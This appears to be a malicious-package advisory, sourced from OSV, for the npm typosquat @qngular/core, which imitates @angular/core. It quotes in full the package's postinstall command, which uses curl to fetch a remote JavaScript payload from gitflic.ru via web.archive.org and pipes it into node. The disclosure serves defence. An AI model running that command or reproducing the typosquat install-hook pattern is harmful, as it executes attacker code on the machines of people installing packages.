@qngular/core@22.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC
OSV ID
MAL-2026-17544
Ecosystem
npm
Summary
Package @qngular/core is a one-character typosquat of @angular/core and copies the real package's description, author, and repository metadata. The postinstall lifecycle script in package.json runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an opaque, non-publisher-controlled JavaScript payload from a third-party host (gitflic.ru via a web.archive.org proxy) and piping it unverified into node. This executes attacker-controlled code on the installer's machine during npm install.
Source: amazon-inspector (e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.